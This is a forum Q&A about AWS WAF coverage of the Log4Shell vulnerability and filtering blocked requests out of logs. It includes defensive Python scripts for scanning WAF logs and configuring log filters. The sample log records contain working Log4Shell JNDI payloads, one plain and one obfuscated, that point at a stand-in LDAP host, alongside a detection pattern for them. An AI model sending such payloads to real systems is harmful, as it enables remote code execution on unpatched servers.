WAF Setting CVE-2021-44228


Dear AWS,

thank you for reacting so quickly to mitigate CVE-2021-44228. We have enabled AWS WAF for our workloads but see some room for improvement:

check all headers

It looks as if the WAF nicely filters all strings that might result in a JNDI call. But it looks as if not every header is checked. So we see 'x-forward-for' or 'http_user_agent' headers in our logs that contain malicious data without being blocked (they have status code 200 instead of 403). Examples ;-) are not possible due to the AWS WAF.

suppress malicious content

Even if the WAF works nicely and blocks the malicious content, an entry is written to the logs. So an unpatched system reading this log will be bitten by the vulnerability. In our case it is AWS OpenSearch and we should be fine. But the possibility to have something like "don't log blocked requests" might be an idea for improvement. Doing so on the AWS side would help people to really "not even get in contact" with malicious content.

Just my 2 cents ;-)

Warm regards from Munich!

Thorsten

Matrix
asked 2 years ago, 368 views

1 Answer
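The first point above (payloads arriving in headers other than the ones the WAF inspects, and showing up in logs with status 200) is something you can check yourself by walking every header of every AWS WAF log record. The following is an added example, not code from the thread or from AWS; the log records are constructed to mimic the AWS WAF log format with only the fields used here, and the normalisation of nested lookups (`${lower:…}`, `${…:-…}`, URL encoding) covers the common obfuscations rather than every possible one.

```python
"""Scan AWS WAF log records for JNDI lookup strings in every request header.

Added example; not code from the original thread or from AWS. The log lines
below are constructed to mimic the AWS WAF log format (fields trimmed).
"""
import json
import re
from urllib.parse import unquote

# Log4j lookups attackers nest to hide the literal "jndi" token, e.g.
# ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...}
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize_lookup(value: str) -> str:
    """Undo URL encoding and simple lookup obfuscation until nothing changes."""
    value = unquote(value)
    previous = None
    while previous != value:
        previous = value
        value = _CASE_LOOKUP.sub(lambda m: m.group(1), value)
        value = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)
    return value.lower()


def contains_jndi(value: str) -> bool:
    return "${jndi:" in normalize_lookup(value)


def jndi_findings(log_lines):
    """One finding per header carrying a JNDI lookup, whatever the header name."""
    findings = []
    for line in log_lines:
        record = json.loads(line)
        request = record.get("httpRequest", {})
        for header in request.get("headers", []):
            if contains_jndi(header.get("value", "")):
                findings.append({
                    "clientIp": request.get("clientIp"),
                    "header": header["name"],
                    "action": record.get("action"),
                    "terminatingRuleId": record.get("terminatingRuleId"),
                })
    return findings


def unblocked(findings):
    """Findings the WAF let through (anything other than BLOCK) get the first look."""
    return [f for f in findings if f["action"] != "BLOCK"]


# Constructed sample records: one blocked User-Agent payload, one obfuscated
# X-Forwarded-For payload that was allowed, one benign request.
SAMPLE_WAF_LOG = [
    json.dumps({
        "timestamp": 1639500000000, "action": "BLOCK",
        "terminatingRuleId": "AWS-AWSManagedRulesKnownBadInputsRuleSet",
        "labels": [{"name": "awswaf:managed:aws:known-bad-inputs:Log4JRCE"}],
        "httpRequest": {"clientIp": "203.0.113.10", "uri": "/", "headers": [
            {"name": "Host", "value": "app.example.com"},
            {"name": "User-Agent", "value": "${jndi:ldap://203.0.113.5:1389/a}"}]}}),
    json.dumps({
        "timestamp": 1639500001000, "action": "ALLOW",
        "terminatingRuleId": "Default_Action", "labels": [],
        "httpRequest": {"clientIp": "203.0.113.11", "uri": "/login", "headers": [
            {"name": "Host", "value": "app.example.com"},
            {"name": "User-Agent", "value": "Mozilla/5.0"},
            {"name": "X-Forwarded-For",
             "value": "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.5:1389/Exploit}"}]}}),
    json.dumps({
        "timestamp": 1639500002000, "action": "ALLOW",
        "terminatingRuleId": "Default_Action", "labels": [],
        "httpRequest": {"clientIp": "198.51.100.7", "uri": "/", "headers": [
            {"name": "Host", "value": "app.example.com"},
            {"name": "User-Agent", "value": "curl/7.79.1"}]}}),
]

if __name__ == "__main__":
    for finding in unblocked(jndi_findings(SAMPLE_WAF_LOG)):
        print("JNDI lookup not blocked:", finding)
```

Run it over a real WAF log export (one JSON record per line) and treat every finding with an action other than BLOCK as a request that reached the backend; the `terminatingRuleId` tells you which rule let it through.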

Hi Thorsten,

thank you for the feedback. We continue to iterate the AWSManagedRulesKnownBadInputsRuleSet Rule Group as we learn more. To receive automatic updates to the AWSManagedRulesKnownBadInputsRuleSet, please choose the default version - see https://aws.amazon.com/security/security-bulletins/AWS-2021-006/ for the latest updates.

Re the log filtering, you can add filtering to specify which web requests are kept in the logs and which are dropped. You can filter on the rule action and on the web request labels that were applied during the request evaluation. You can use the awswaf:managed:aws:known-bad-inputs:Log4JRCE label as log filter. See https://docs.aws.amazon.com/waf/latest/developerguide/logging-management.html and https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs for additional details.

AWS EXPERT
Luca_I
answered 2 years ago
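The label-based log filter the answer describes can be expressed as the `LoggingFilter` of a WAFv2 logging configuration and checked locally before it is applied. The following is an added example, not AWS code and not from the thread: the ARNs are placeholders, the log records are constructed, and the local evaluator assumes that the first matching filter decides the outcome and that the default behaviour applies when none matches.

```python
"""Build an AWS WAF logging filter that drops requests labelled Log4JRCE and
evaluate it locally against sample records.

Added example; not AWS code and not from the thread. ARNs are placeholders,
records are constructed. The configuration dict has the shape accepted by
wafv2 PutLoggingConfiguration (boto3: client('wafv2').put_logging_configuration).
"""
import json

LOG4J_LABEL = "awswaf:managed:aws:known-bad-inputs:Log4JRCE"


def logging_configuration(web_acl_arn: str, log_destination_arn: str) -> dict:
    """Keep everything by default, drop records carrying the Log4JRCE label."""
    return {
        "ResourceArn": web_acl_arn,
        "LogDestinationConfigs": [log_destination_arn],
        "LoggingFilter": {
            "DefaultBehavior": "KEEP",
            "Filters": [
                {
                    "Behavior": "DROP",
                    "Requirement": "MEETS_ANY",
                    "Conditions": [
                        {"LabelNameCondition": {"LabelName": LOG4J_LABEL}},
                    ],
                }
            ],
        },
    }


def _condition_matches(condition: dict, record: dict) -> bool:
    if "ActionCondition" in condition:
        return record.get("action") == condition["ActionCondition"]["Action"]
    if "LabelNameCondition" in condition:
        wanted = condition["LabelNameCondition"]["LabelName"]
        return any(label.get("name") == wanted for label in record.get("labels", []))
    raise ValueError(f"unsupported condition: {condition}")


def log_behavior(logging_filter: dict, record: dict) -> str:
    """Return KEEP or DROP. Assumption: first matching filter wins, else default."""
    for flt in logging_filter["Filters"]:
        results = [_condition_matches(c, record) for c in flt["Conditions"]]
        matched = all(results) if flt["Requirement"] == "MEETS_ALL" else any(results)
        if matched:
            return flt["Behavior"]
    return logging_filter["DefaultBehavior"]


def kept_records(logging_filter: dict, log_lines) -> list:
    return [r for r in map(json.loads, log_lines) if log_behavior(logging_filter, r) == "KEEP"]


# Constructed sample records: blocked Log4JRCE hit, a Log4JRCE hit while the
# rule group ran in COUNT mode, and a normal allowed request.
SAMPLE_WAF_LOG = [
    json.dumps({"action": "BLOCK", "labels": [{"name": LOG4J_LABEL}],
                "httpRequest": {"clientIp": "203.0.113.10", "uri": "/"}}),
    json.dumps({"action": "COUNT", "labels": [{"name": LOG4J_LABEL}],
                "httpRequest": {"clientIp": "203.0.113.11", "uri": "/"}}),
    json.dumps({"action": "ALLOW", "labels": [],
                "httpRequest": {"clientIp": "198.51.100.7", "uri": "/health"}}),
]

CONFIG = logging_configuration(
    "arn:aws:wafv2:eu-central-1:123456789012:regional/webacl/example/placeholder",
    "arn:aws:logs:eu-central-1:123456789012:log-group:aws-waf-logs-example",
)

if __name__ == "__main__":
    print(json.dumps(CONFIG, indent=2))
    for record in kept_records(CONFIG["LoggingFilter"], SAMPLE_WAF_LOG):
        print("kept:", record["action"], record["httpRequest"]["uri"])
```

Two caveats before applying this: the label is attached whenever the Log4JRCE rule matches, so records from a rule group running in COUNT mode are dropped as well, and dropped records are gone for forensics. If you want to know how often you are being probed without feeding the payload to a log consumer, keep the records and use the `RedactedFields` setting to redact the offending header instead, or add an `ActionCondition` so only blocked requests are dropped.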
